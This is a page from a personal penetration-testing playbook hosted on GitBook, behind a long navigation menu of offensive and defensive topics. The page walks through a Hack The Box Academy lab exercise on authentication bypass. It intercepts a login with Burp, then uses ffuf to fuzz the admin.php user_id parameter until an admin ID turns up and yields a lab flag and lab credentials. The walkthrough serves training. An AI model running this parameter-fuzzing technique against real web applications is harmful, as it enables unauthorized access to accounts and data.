CND
  • CND
    • WHOAMI
    • PROJECTS
      • DEV
        • PERSONAL WEBSITE
        • GITHUB
        • ARDUINO
      • CYBER
        • PERSONAL CYBER RANGE
    • SELF DEVELOPMENT
      • TRAINING PLATFORMS
      • PREP MATERIALS
        • OPERATOR DEVELOPMENT & INTEGRATION EFFORT (ODIE) ASSESSMENT
        • COMPUTER NETWORK ASSESSMENT BATTERY (CNAB)
        • COMPUTER NETWORK OPERATIONS QUALIFICATION COURSE (CNOQC)
        • COMPUTER NETWORK OPERATIONS DEVELOPMENT PROGRAM (CNODP)
        • DATA ENGINEER
        • CYBER COMMON TECHNICAL CORE (CCTC)
      • WRITEUPS/WALKTHROUGHS
        • HTB ACADEMY
          • BUG BOUNTY HUNTER
        • HTB LABS
          • STARTING POINT
            • TIER 0
              • 01.MEOW (TELNET)
              • 02.FAWN (FTP)
              • 03.DANCING (SMB)
              • 04.REDEEMER (REDIS DB)
              • 05.EXPLOSION (RDP)
              • 06.PREIGNITION (WEB FORM LOGIN)
              • 07.MONGOD (MONGODB)
              • 08.SYNCED (RSYNC)
            • TIER 1
              • 01.APPOINTMENT (SQL INJECTION)
              • 02.SEQUEL (MYSQL)
              • 03.CROCODILE (FTP & WEB FORM LOGIN)
              • 04.RESPONDER (RFI, NTLM CAPTURE, PW CRACKING & WINRM)
              • 05.THREE (AWS S3 BUCKET)
              • 06.IGNITION (DIRECTORY ENUMERATION & BRUTE FORCE)
              • 07.BIKE (SSTI)
              • 08.FUNNEL (PASSWORD SPRAYING & LOCAL PORT FORWARDING)
              • 09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)
              • 10.TACTICS (SMB)
            • TIER 2
              • 01.ARCHETYPE (PRIVESC & MSSQL SERVER)
              • 02.OOPSIE
              • 03.VACCINE
              • 04.UNIFIED
        • THM
          • ADVENT OF CYBER
            • 2024
            • 2023
            • 2022
          • SOC LEVEL 1
            • PRACTICAL EXERCISES
              • NETWORK SECURITY & TRAFFIC ANALYSIS
                • SNORT
                • NETWORK MINER
                • ZEEK
                • BRIM
                • WIRESHARK: BASICS
                • WIRESHARK: PACKET OPERATIONS
                • WIRESHARK: TRAFFIC ANALYSIS
                • TSHARK: THE BASICS
                • TSHARK: CLI WIRESHARK FEATURES
              • ENDPOINT SECURITY MONITORING
                • INTRO TO ENDPOINT SECURITY
            • SKILLS ASSESSMENT
              • NETWORK SECURITY & TRAFFIC ANALYSIS
                • SNORT CHALLENGE (BASICS)
                • SNORT CHALLENGE (LIVE ATTACKS)
                • ZEEK EXERCISES
                • TSHARK CHALLENGE I: TEAMWORK
                • TSHARK CHALLENGE II: DIRECTORY
              • ENDPOINT SECURITY MONITORING
        • HOLIDAY HACK CHALLENGE (SANS)
          • 2024:SNOW-MAGGEDON
      • PROVING GROUNDS
        • ADVENT OF CYBER: SIDE QUEST (THM)
          • 2024
        • CMU
        • CYBER FLAG
        • PRESIDENT'S CUP
      • COLLEGE
        • 03.DAKOTA STATE UNIVERSITY (DSU)
          • 2025
            • 01.CSC428: REVERSE ENGINEERING
          • 2024
            • 01.CSC314: ASSEMBLY LANGUAGE
            • 02.CSC300: DATA STRUCTURES
              • 01.C++ OVERVIEW: CLASSES & DATA ABSTRACTION
              • 02.OBJECT ORIENTED DESIGN & C++
              • 03.POINTERS
              • 04.ARRAY-BASED LIST
              • 05.LINKED LISTS
              • 06.DOUBLY LINKED LIST
              • 07.STACKS
              • 08.QUEUES
              • 09.BINARY TREES
          • 2023
            • 01.CSC250: COMPUTER SCIENCE II
            • 02.CSC334: WEB DEVELOPMENT
            • 03.MATH201: INTRODUCTION TO DISCRETE MATHEMATICS
        • 02.UNIVERSITY OF ARIZONA (UA)
        • 01.TECHNICAL COLLEGE OF THE LOWCOUNTRY
      • NOTES
  • PLAYBOOK
    • DCO
      • 01.PRE-ENGAGEMENT
        • 01.PDSS
      • 02.ENGAGEMENT
        • PLAN
          • 01.ROE
        • PREPARE
          • 01.CTI
          • 02.DETECTION ENGINEERING
        • EXECUTE
          • THREAT HUNTING
            • 01.TRAFFIC ANALYSIS
              • LOW-HANGING FRUIT
                • HOST IDENTIFICATION
                  • WIRESHARK
                  • TSHARK
                • CLEARTEXT CREDENTIALS
                  • WIRESHARK
                • CLEARTEXT PROTOCOLS
                  • WIRESHARK
                    • FTP ANALYSIS
                    • HTTP ANALYSIS
                    • LOG4J ANALYSIS
                • DNS QUERIES
                  • TSHARK
                • USER-AGENTS
                  • TSHARK
              • PORT SCANS
                • WIRESHARK
                • KIBANA
                • SPLUNK
              • ARP POISONING
                • WIRESHARK
              • TUNNELING (DNS/ICP)
                • WIRESHARK
                  • ICMP TUNNELING
                  • DNS TUNNELING
              • ENCRYPTED PROTOCOLS
                • WIRESHARK
                  • HTTPS ANALYSIS
                    • SNI INSPECTION
                    • ENCRYPTION KEY LOG FILE
            • 02.LOG ANALYSIS
          • INCIDENT RESPONSE
          • FORENSICS
            • MALWARE ANALYSIS
            • REVERSE ENGINEERING
        • ASSESS
      • 03.POST ENGAGEMENT
        • DEBRIEF
        • DOCUMENTATION
          • MISSION DEFENSE PLAN/RISK MITIGATION PLAN
    • OCO
      • 01.PRE-ENGAGEMENT
        • 01.PDSS
        • 02.ROE
        • 03.RESOURCE DEVELOPMENT
          • 01.INFRASTRUCTURE DEVELOPMENT
          • 02.MALWARE DEVELOPMENT
          • 03.EXPLOIT DEVELOPMENT
      • 02.ENGAGEMENT
        • 01.IN
          • 01.PRE-ACCESS
            • 01.VPN CONNECTION
            • 02.ANALYST LOGGING
            • 03.OPNOTES
          • 02.ACCESS
            • RECONNAISSANCE (EXTERNAL)
              • RECONNAISSANCE (PASSIVE)
                • OSINT
              • RECONNAISSANCE (ACTIVE)
                • WEB
                  • SUBDOMAIN ENUMERATION
                    • CURL
                  • SUBDOMAIN BRUTE-FORCING
                    • DNSENUM
                  • DNS ZONE TRANSFER
                    • DIG
                  • DIRECTORY ENUMERATION
                    • CURL
                  • PROFILING/FINGERPRINTING
                    • WAFWOOF
                    • WHATWEB
                    • WAPPALYZER
                  • FUZZING
                    • 01.SUBDOMAIN FUZZING
                      • FFUF
                    • 02.VIRTUAL HOSTS FUZZING
                      • GOBUSTER
                      • FFUF
                    • 03.DIRECTORY FUZZING
                      • FFUF
                    • 04.PAGE FUZZING
                      • FFUF
                      • GOBUSTER
                    • 05.PARAMETER FUZZING
                      • FFUF
                    • 06.VALUE FUZZING
                      • FFUF
                  • USER ENUMERATION
                    • WEB LOGIN FORM
                  • SPIDERING/WEB CRAWLING
            • VULNERABILITY SCANNING
              • WEB
                • NIKTO
            • WEAPONIZATION
              • OBFUSCATION
                • JAVASCRIPT
              • SHELLCODES
              • PASSWORDS/PINS
                • PINS
                • DICTIONARY
                • CUSTOM WORDLIST
                  • USERNAMES
                  • PASSWORDS
              • TROJANS
                • TROJAN BACKDOOR
              • MALICIOUS DOCUMENTS
                • MACRO EMBEDDING DOCX
              • SCRIPTS
                • WEB SHELLS
                  • PHP
                • REVERSE SHELLS
                  • BASH
                  • GROOVY (JENKINS)
                • ENUMERATION
                  • PYTHON
                    • PARAM-FUZZER.PY
                  • BASH
                • WSDL
                  • SQLI
                  • CMD INJECTION
            • DELIVERY
              • SOCIAL ENGINEERING
              • WATERING HOLE
              • SUPPLY CHAIN
            • EXPLOITATION
              • INJECTIONS
                • CLIENT-SIDE
                  • CROSS-SITE SCRIPTING (XSS)
                    • XSS DISCOVERY
                      • XSS TESTING (MANUAL)
                      • XSS TESTING (HYBRID)
                    • WEBPAGE DEFACEMENT
                    • XSS PHISHING
                    • XSS SESSION HIJACKING (AKA COOKIE STEALING)
                      • BASIC XSS TESTS
                      • OBTAINING SESSION COOKIES (PHP SERVER)
                      • OBTAINING SESSION COOKIES (NETCAT SERVER)
                  • SQL INJECTION (SQLI)
                    • 01.SQLI DISCOVERY
                      • 01.SQLI TESTING (MANUAL)
                        • URL PARAMETER METHOD
                        • LOGIN FORMS
                      • 01.SQLI TESTING (HYBRID)
                        • SQLMAP
                      • 02.SQLI LOCATION IDENTIFICATION
                    • 02.SQLI DB ENUMERATION
                    • AUTHENTICATION BYPASS
                    • CREDENTIAL DUMPING
                    • SQLI READING FILES
                    • SQLI WRITING WEB SHELL FILES
                  • COMMAND INJECTION
                    • 01.DISCOVERY
                    • FILTER EVASION/BYPASS
                      • FRONT-END VALIDATION: CUSTOMIZED HTTP REQUEST
                      • SPACE & NEW LINE CHARACTERS
                      • SLASH & BACKSLASH
                      • BLACKLISTED CHARACTERS
                      • BLACKLISTED CMDS
                      • ADVANCED CMD OBFUSCATION
                    • EVASION TOOLS
                  • HTML INJECTION
                  • XML EXTERNAL EXTITY (XXE)
                    • DISCOVERY
                    • INFORMATION DISCLOSURE
                    • INFORMATION TAMPERING
                      • RCE
                    • EXFILTRATION
                      • OOB BLIND DATA EXFIL
                        • XXEINJECTOR (AUTOMATED)
                    • IMPACT
                      • DOS
                  • CROSS-SITE REQUEST FORGERY (CSRF/XSRF)
                    • DISCOVERY
                    • CSRF BYPASS
                    • TRIGGERS
                      • W/O ANTI-CSRF TOKEN
                      • WITH ANTI-CSRF TOKEN (GET METHOD)
                      • WITH ANTI-CSRF TOKEN (POST METHOD)
                      • CHAINING (XSS & CSRF)
                        • MAKING PROFILE PUBLIC
                        • ADDING A FUNCTION TO THE PROFILE PAGE
                      • WEAK CSRF TOKENS
                • SERVER-SIDE
                  • SSRF
                    • 01.DISCOVERY
                      • BLIND SSRF
                    • ENUMERATION
                    • LFI
                  • SSTI
                    • IDENTIFICATION
                    • JINJA (EXPLOITATION)
                    • TWIG (EXPLOITATION)
                    • HANDLEBARS NODEJS (EXPLOITATION)
                      • PAYLOAD
                  • SSI INJECTION
                    • SSI (EXPLOITATION)
                  • XSLT INJECTION
                    • IDENTIFICATION
                    • XSLT INJECTION (EXPLOITATION)
              • FILE UPLOADS
                • 01.DISCOVERY
                • FILTER EVASION/BYPASS
                  • CLIENT-SIDE VALIDATION
                    • BACK-END REQUEST MODIFICATION
                    • DISABLING FRONT-END VALIDATION
                  • BACK-END VALIDATION
                    • BLACKLIST EXTENSION FILTERS
                    • WHITELIST EXTENSION FILTERS
                    • CONTENT TYPE FILTER
                • UPLOAD EXPLOITATION
                  • WEB SHELL
                    • CUSTOM WEB SHELLS
                      • PHP WEB SHELL
                      • .NET WEB SHELL
                      • HTML FORM SHELL
                  • REVERSE SHELLS
                    • CUSTOM REVERSE SHELLS
                  • LIMITED FILE UPLOADS
                    • EMBEDDED JAVASCRIPT (XSS)
                    • XML EXTERNAL ENTITY (XXE)
                • ARBITRARY FILE UPLOAD
              • BRUTE FORCE
                • WEB
                  • BASIC HTTP AUTHENTICATION
                  • WEB LOGIN FORMS
                    • HYDRA
                    • FFUF
                  • PASSWORD RESET: TOKENS
                  • 2FA
                  • LOW-HANGING FRUIT
                    • EMPTY/DEFAULT PWS
                    • DEFAULT CREDENTIALS
                  • PASSWORD RESET: SECURITY QUESTIONS
                  • PIN CRACKING
                  • SESSION TOKENS
                    • IDENTIFICATION
                    • TAMPERING/FORGING SESSION TOKENS
                • EXPOSED SERVICES
                  • SSH
                  • FTP
                  • RDP
                  • SMB
                • PASSWORD CRACKING (OFFLINE)
                  • HASH IDENTIFICATION
                  • JOHN THE RIPPER
                  • HASHCAT
              • AUTHENTICATION BYPASS
                • DIRECT ACCESS
                • PARAMETER MODIFICATION
                • HTTP VERB TAMPERING
                  • INSECURE CONFIGURATION
                  • INSECURE CODING
                • SESSION ATTACKS
                  • SESSION HIJACKING
                  • SESSION FIXATION
                    • DISCOVERY
              • WI-FI
                • WPA/WPA2 CRACKING
              • IDOR
                • IDENTIFICATION
                • INFORMATION DISCLOSURE
                  • PLAINTEXT REFERENCES
                  • PARAMETER MANIPULATION & COOKIE TAMPERING
                  • ENCODED REFERENCES
                • INFORMATION ALTERATION
                  • INSECURE FUNCTION CALLS
              • FILE INCLUSION
                • LFI
                  • DISCOVERY
                    • FUZZING FOR LFI PAYLOADS (AUTOMATED)
                      • EXTRA PAYLOADS
                  • BASIC BYPASSES
                  • SOURCE CODE DISCLOSURE
                  • RCE
                    • FILE UPLOADS
                    • LOG FILE POISONING
                      • PHP SESSION POISONING
                      • SERVER LOG POISONING
                • RFI
                  • DISCOVERY
                  • RCE
              • OPEN REDIRECT
                • DISCOVERY
                • CREDENTIAL THEFT
            • DEFENSE EVASION
            • FOOTHOLD
              • RECONNAISSANCE (INTERNAL)
                • HOST DISCOVERY
              • ENUMERATION
                • SERVICES
                  • SMB
                  • MS SQL
                • WINPEAS
              • PERSISTENCE
              • COMMAND & CONTROL
        • 02.THROUGH
          • NETWORK PIVOTING
            • MITM (POST-EXPLOITATION)
              • SESSION HIJACKING
            • PORT FORWARDING
              • LOCAL PORT FORWARDING
          • DISCOVERY
          • PRIVILEGE ESCALATION
            • PSEXEC.PY
            • HARDCODED CREDENTIALS
            • MISCONFIGURATIONS
              • SETUID
            • VI
          • EXECUTION
          • CREDENTIAL ACCESS
            • SESSION HIJACKING
            • PASSWORD CRACKING
              • JOHN THE RIPPER
                • CRACKING ENCRYPTED FILES (ZIP)
                • CRACKING ENCRYPTED FILES (PDF)
              • HASHCAT
                • CRACKING MD5 HASHES
          • LATERAL MOVEMENT
        • 03.OUT
          • COLLECTION
          • EXFILTRATION
            • SCP
          • IMPACT
            • DOS
              • XXE PAYLOAD DOS
              • DECOMPRESSION BOMB
              • PIXEL FLOOD
              • REDOS
                • DISCOVERY
            • TIMING ATTACKS
              • RACE CONDITIONS
            • MITM
              • WEBSOCKETS
          • OBJECTIVES
      • 03.POST-ENGAGEMENT
        • ARTIFACTS CLEARING
        • DEBRIEF
        • INFRASTRUCTURE RESET
        • DOCUMENTATION
          • REPORT
    • DEV
    • SRE
      • REVERSE ENGINEERING
        • STRING PATCHING
        • BINARY PATCHING
        • STACK MAPPING
        • RECOGNIZING C CODE CONSTRUCTS IN ASSEMBLY
          • GLOBAL & LOCAL VARIABLES
          • ARITHMETIC OPERATIONS
          • FUNCTION CALLS
          • ARRAYS
          • STRUCTS
          • LINKED-LIST TRAVERSAL
          • FLOW CONTROL
            • IF STATEMENTS
            • SWITCH STATEMENTS
            • LOOPS
        • FINDING MAIN()/ENTRY POINT W/O DEBUG SYMBOLS
      • SOFTWARE EXPLOITATION
  • ENGINEERING
    • INSTALLATION PROCEDURES
      • TARGETS
        • DVWA
        • VULNHUB
    • CONFIGURATION PROCEDURES
      • WEB
        • BASIC HTTP AUTHENTICATION
        • CSRF PROTECTED FORM
      • NETWORKING
        • CISCO SWITCH
          • VLAN TRUNKS
          • PORT SECURITY
        • CISCO ROUTER
  • SYSTEM ADMINISTRATION
    • LINUX
      • NETWORKING
        • RESTART NETWORK SERVICES
        • LOCAL DNS RESOLUTION
      • LOCATING
      • FILE SHARING
      • PACKAGES
        • NORDVPN
    • WINDOWS
      • DISK PARTITIONING
        • DISKPART
      • ACTIVE DIRECTORY
        • PASSWORD
        • DOMAIN USER
      • OPEN SSH
        • PRIVATE KEY PERMISSIONS
      • LOCAL DNS RESOLUTION
  • TOOLING
    • DCO
      • CYBER THREAT INTELLIGENCE (CTI)
        • OPENCTI
        • MALWARE INFORMATION SHARING PLATFORM (MISP)
      • DETECTION ENGINEERING
        • HOST
          • NETWORK MINER
        • NETWORK
          • SNORT
            • SELF-TEST MODE
            • SNIFFER MODE
            • PACKET LOGGER MODE
            • IDS/IPS MODE
            • PCAP READING MODE
            • RULE WRITING
              • SAMPLE RULES
              • MAGIC NUMBERS
      • THREAT HUNTING
        • NETWORK ANALYSIS
          • IDS/IPS
            • SNORT
            • SURICATA
          • PACKET ANALYZER
            • WIRESHARK
              • MERGING PCAPS
              • FINDING SPECIFIC STRINGS/PACKETS
              • EXPORTING PACKETS
              • EXPORTING OBJECTS
              • CREATING PROFILES
              • BOOKMARKING FILTERS
              • PACKET FILTERING
                • OPERATORS & FUNCTIONS
                • PROTOCOL FILTERS
                  • IP FILTERS
                  • TCP/UDP FILTERS
                  • APPLICATION FILTERS
                • FILTER BUILDER
              • CREATING FW RULES
            • TSHARK
              • SNIFFING TRAFFIC
                • CAPTURE FILTERS
              • READING CAPTURE FILE
                • DISPLAY FILTERS
                • OUTPUT FORMAT SELECTOR
              • FOLLOWING DATA STREAMS
              • EXTRACTING DATA
              • PACKET FILTERING
                • DISPLAYING PACKET STATISTICS
                • ADVANCED FILTERING
            • TCPDUMP
              • EXTRACTING INFORMATION
          • SIEM
            • ELASTIC STACK
            • SECURITY ONION
            • SPLUNK
          • NSM
            • ZEEK
              • MODES
              • LOGS
              • SIGNATURES
                • HTTP CLEARTEXT PASSWORD DETECTION
                • FTP BRUTE FORCE DETECTION
              • SCRIPTING
              • EVENT CORRELATION
              • FRAMEWORK
                • FILE FRAMEWORK | HASHES
                • FILE FRAMEWORK | EXTRACT FILES
                • NOTICE FRAMEWORK | INTELLIGENCE
                • CLEARTEXT SUBMISSION OF PWDS
                • GEO-LOCATION DATA
              • PACKAGES
        • HOST ANALYSIS
          • YARA
          • FLOSS
          • BRIM
            • QUERIES
            • QUERY REFERENCE
          • SYSINTERNALS
            • TCPVIEW
            • PROCESS EXPLORER
            • SYSMON
          • POWERSHELL
          • WINDOWS EVENT LOGS
          • OSQUERY
          • EDR
            • WAZUH
      • DFIR
        • EXIFTOOL
        • NETWORK FORENSICS
          • NETWORK MINER
      • ATOMIC RED TEAM
      • UTILITIES
        • JQ
      • REVERSE ENGINEERING
        • DISASSEMBLERS
          • RADARE2
          • GHIDRA
          • IDA PRO
          • BINARY NINJA
          • CUTTER
          • HOPPER
        • DEBUGGERS
          • GDB/GEF
          • GEF
          • X64DBG
          • WINDBG
    • OCO
      • C2
        • COBALT STRIKE
        • SLIVER
        • MYTHIC C2
          • INSTALLATION
            • ON-PREMISE
            • AWS EC2
            • AZURE
          • C2 PROFILES
            • HTTP
          • AGENTS
            • WINDOWS
          • PAYLOAD CREATION
            • AWS CLOUDFRONT IMPLEMENTATION
            • AZURE FRONT DOOR IMPLEMENTATION
            • NGINX CONDITIONAL REDIRECTION IMPLEMENTATION
        • MITRE CALDERA
          • ON-PREMISE
        • HAVOC C2
        • METASPLOIT
      • VPS
        • REDIRECTORS
          • AWS CLOUDFRONT
            • LOAD BALANCER (AWS EC2)
            • CLOUDFRONT
              • GEO RESTRICTION (OPSEC)
          • AZURE FRONT DOOR
            • FRONT DOOR
          • NGINX (AWS EC2/AZURE)
            • C2 AGENT/USER-AGENT CONDITIONAL REDIRECTION (OPSEC)
              • NGINX FW RULE
              • C2 SERVER FW RULE
            • DIRECTORY REDIRECTION (OPSEC)
          • NGINX (ON-PREMISE)
        • PAYLOAD SERVER
          • NGINX (AWS EC2/AZURE)
            • FW RULES
            • CONFIGURATION
              • FACADE FILES
          • PWNDROP
        • PHISHING SERVER
          • EVILGINX (AWS EC2/AZURE)
            • FW RULES
            • HOMOGRAPHS
            • TRIGGERS
              • CREDENTIAL HARVESTING
              • MFA BYPASS
          • GOPHISH
            • FW RULES
            • CONFIGURATION
            • CAMPAIGNS
            • TRIGGERS
              • MALICIOUS DOWNLOADS
      • WIFI
        • ALFA AWUS1900 WIRELESS ADAPTER
          • DRIVERS
      • OSINT
        • FINAL RECON
        • RECON-NG
        • THE HARVESTER
        • SPIDERFOOT
        • OSINT FRAMEWORK
      • UTILITIES
        • BROWSER DEVTOOLS
        • CADAVER
        • CURL
        • CUSTOM WORDLIST
          • USERNAME ANARCHY
          • CUPP
        • DATABASE
          • MYSQL
          • PSQL
        • DIG
        • DNSENUM
        • FIND
        • FTP
        • HTML2TEXT
        • IMPACKET
          • PSEXEC.PY
          • MSSQLCLIENT.PY
        • MULTI-FUNCTION
        • NETCAT
        • NMAP
        • PASSWORD
          • BRUTE FORCE (ONLINE)
            • HYDRA
            • MEDUSA
            • FFUF
            • CRACKMAPEXEC (SMB)
          • CRACKING (OFFLINE)
            • HASH-ID.PY
            • HASHID
            • JOHN THE RIPPER
            • HASHCAT
        • PRIVESC
          • WINPEAS
        • PROXIES
          • WRAPPER
            • PROXYCHAINS
          • WEB PROXIES
            • BURP SUITE
              • SETTINGS
              • WEB CRAWLING
            • ZED ATTACK PROXY (ZAP)
          • BROWSER PROXIES
            • FIREFOX
            • EXTENSIONS
              • FOXY PROXY
              • PROXY SWITCHYOMEGA (BRAVE BROWSER)
        • REMOTE ACCESS
          • FREERDP
        • RESPONDER
        • RSYNC
        • SCRIPT
        • SMBCLIENT
        • SQLMAP
          • GET REQUESTS
          • POST REQUESTS
          • BYPASSING WEBAPP PROTECTIONS
            • TAMPER SCRIPTS
          • OS EXPLOITATION
          • SQLI
            • CMD INJECTION
        • SSH
        • SSTIMAP
        • TEE
        • TREE
        • WEB CONTENT DISCOVERY
          • GOBUSTER
          • DIRB
        • WGET
        • WPSCAN
      • TECHNOLOGY PROFILER
        • WAPPALYZER
    • DEV
      • COMPILERS
        • COMPILER EXPLORER (ONLINE)
        • GCC (LINUX)
        • VISUAL STUDIO CLI (WINDOWS)
      • UTILITIES
        • HEXDUMP
        • CODE BEAUTIFY
        • GIT (CLI)
      • LANGUAGES
        • COMPILED
          • C
            • TEMPLATE
              • SYNTAX
                • LOOPS
                  • WHILE
                  • DO WHILE
                  • FOR
                • CONDITIONALS
                • FUNCTIONS
                • BITWISE OPERATIONS
                • CONSTRUCTS
                  • DATA TYPES
                    • PRIMITIVE
                    • DERIVED
                    • USER-DEFINED
                • DATA STRUCTURE
                  • ARRAYS (AKA VECTORS)
                • POINTERS
                  • POINTER ARITHMETIC
                • ARRAYS
                  • MULTI-DIMENSIONAL ARRAYS
                • SIZEOF
                • STRINGS (ARRAY OF CHARACTERS)
                  • PRINTING STRINGS
            • OPERATORS
            • KEYWORDS
            • FORMAT SPECIFIERS
            • TROUBLESHOOTING
              • SUPPRESSING SECURITY WARNINGS
            • ENCODING SCHEMES
            • TYPE MODIFIERS
          • C++
            • TEMPLATE
        • MARKUP
          • HTML
            • URL ENCODING
        • INTERPRETED/SCRIPTING
          • PYTHON
    • SRE
      • DISASSEMBLERS
        • GHIDRA
          • FUNCTION SIGNATURES
            • COMMON "C" FUNCTION SIGNATURES
          • GRAPH VIEW
          • CONVERTING DATA TYPES
          • HIGHLIGHTING / SLICING
          • LABELING / RENAMING
          • SPECIFYING ARRAYS
          • REBASING
          • IDENTIFYING MAIN VIA REFERENCES & CALL TREES
        • OBJDUMP
      • DEBUGGERS
        • WINDBG
        • GDB/GEF
        • RADARE2
  • RESOURCES
    • ARMY
      • 350-1
      • CAC PKI CERTIFICATES RECOVERY
      • FORCE MANAGEMENT
      • DEFENSE ACQUISITION TRAININGS
      • CAREER MANAGEMENT
      • COLLECTION
        • MISC
        • COMMANDS
        • TRAINING
      • MILITARY RETIREMENT
        • CHECKLIST
        • RESUME
    • CYBER
      • DCO
        • CYBER THREAT EMULATION
        • SYSTEM HARDENING
        • MALWARE ANALYSIS
          • MALWARE BAZAAR
          • MALWARE TRAFFIC ANALYSIS.NET
          • THE ZOO (AKA MALWARE DB)
        • THREAT HUNTING
          • MITRE ATT&CK
          • MITRE CAR
          • MITRE D3FEND
          • MITRE ENGAGE
          • MITRE ENGENUITY
          • ULTIMATE WINDOWS SECURITY
          • TECHNIQUE INTERFACE ENGINE
      • OCO
        • NETWORK PIVOTING
          • THE CYBER PLUMBER'S LAB GUIDE
        • BUG BOUNTY PROGRAMS
        • LIVING OFF THE LAND
          • LOLBAS (WINDOWS)
          • GTFOBINS (UNIX)
          • LOLDRIVERS (WINDOWS)
          • LOLAPPS
        • RECONNAISSANCE
          • WAYBACK MACHINE
          • SHODAN
          • CENSYS
        • VULNERABILITY/EXPLOIT LISTINGS
          • EXPLOIT DB
          • VULNERABILITY LAB
      • OT
        • ICS/SCADA
      • GENERAL
        • GENERATIVE AI/COPILOT
          • CAMOGPT
          • CHATGPT
          • PENTESTGPT
        • UNIFIED KILLCHAIN (UKC)
        • BLOGS
    • AUDIO
Powered by GitBook
On this page
  1. PLAYBOOK
  2. OCO
  3. 02.ENGAGEMENT
  4. 01.IN
  5. 02.ACCESS
  6. EXPLOITATION
  7. AUTHENTICATION BYPASS

PARAMETER MODIFICATION

#
root@oco:~$ seq 1 999 > userID.txt

#intercept requests and identify pertinent info
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit expected input
 
 Request
  ...
  GET /admin.php?user_id=183 HTTP/1.1
  Host: 94.237.61.84:59319
  Cookie: PHPSESSID=7l8q454p2j4mc0ul2jonm6ecn3
  Connection: close
  
  * key msg: Could not load admin data. Please check your privileges. 

root@oco:~$ ffuf -w ./userID.txt -u http://94.237.61.84:59319//admin.php?user_id=FUZZ -fr "Could not load admin data. Please check your privileges."
 372 [Status: 200, Size: 14465, Words: 4165, Lines: 429, Duration: 78ms]

  * HTB{63593317426484ea6d270c2159335780}
PreviousDIRECT ACCESSNextHTTP VERB TAMPERING

Last updated 3 months ago